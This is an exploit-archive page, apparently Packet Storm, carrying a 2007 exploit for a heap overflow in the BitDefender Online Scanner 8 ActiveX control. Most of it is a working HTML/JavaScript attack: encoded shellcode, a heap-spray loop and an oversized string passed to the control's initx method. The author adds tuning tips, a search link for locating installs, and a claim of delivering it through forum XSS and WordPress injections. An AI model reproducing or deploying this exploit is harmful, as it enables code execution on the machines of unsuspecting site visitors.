what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

bitdefenderoscan-activex.txt

bitdefenderoscan-activex.txt
Posted Nov 28, 2007
Authored by Nphinity

BitDefender Online Scanner 8 ActiveX heap overflow exploit that makes use of OScan8.ocx and OScan81.ocx.

tags | exploit, overflow, activex
SHA-256 | 52a89951da1b8dce895efdff343cadc997c9adc65847c7240880f462c7d3a10c

bitdefenderoscan-activex.txt

Change Mirror Download
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BitDefender OScan8.ocx / Oscan81.ocx ActiveX Exploit

=-=-=-=-=-=-=-=-=-=-=-=-PRIVATE! NOT PUBLIC!=-=-=-=-=-=-=-=-=-=-=-=-

http://research.eeye.com/html/advisories/published/AD20071120.html
http://secunia.com/advisories/27717/


This works not 100% - it corrupts random memory in the browser and Launches calculator with success.

Users have had this installed since 2006! With no autoupdates :)

Google Search of BD OSCAN =
http://www.google.com/search?hl=ar&safe=off&rls=fr&hs=P4T&q=%225D86DDB5-BDF9-441B-9E9E-D4730F4EE499%22&btnG=Search

Modify the values in these to help keep it stable:
'SiteAuthority' - different memory address ?? - it turns values to literal address !
while (SiteAuthority.length < 60000) - Maybe larger/smaller?


Crashes IE even if it fails

Tested with Forum XSS Injections + Wordpress 0day + CMS Injections

Nphinity
#SAMAH/#SYR/#SHAHADA
mesra.kl.my.dal.net




=-=-=-=-=-=-=-=-=-=-=-=-PRIVATE! NOT PUBLIC!=-=-=-=-=-=-=-=-=-=-=-=-




<html>


<object classid='clsid:5D86DDB5-BDF9-441B-9E9E-D4730F4EE499' id='BD'>
</object>

<script language="javascript">


SCPL = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");

MemContent = unescape("%u0606");

HSize = 20;

FreeSpace = HSize+SCPL.length

while (MemContent.length<FreeSpace)
{
MemContent+=MemContent;
}

FB = MemContent.substring(0, FreeSpace);

Mem = MemContent.substring(0, MemContent.length-FreeSpace);

while(Mem.length+FreeSpace<0x60000)
{
Mem = Mem+Mem+FB;
}

memory = new Array();

for (x=0;x<600;x++) memory[x] = Mem + SCPL;

var SiteAuthority = '%%';

while (SiteAuthority.length < 60000)
{
SiteAuthority+='\x30\x36\x30\x36';
}

BD.initx(SiteAuthority);

</script>
</html>


Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    20 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close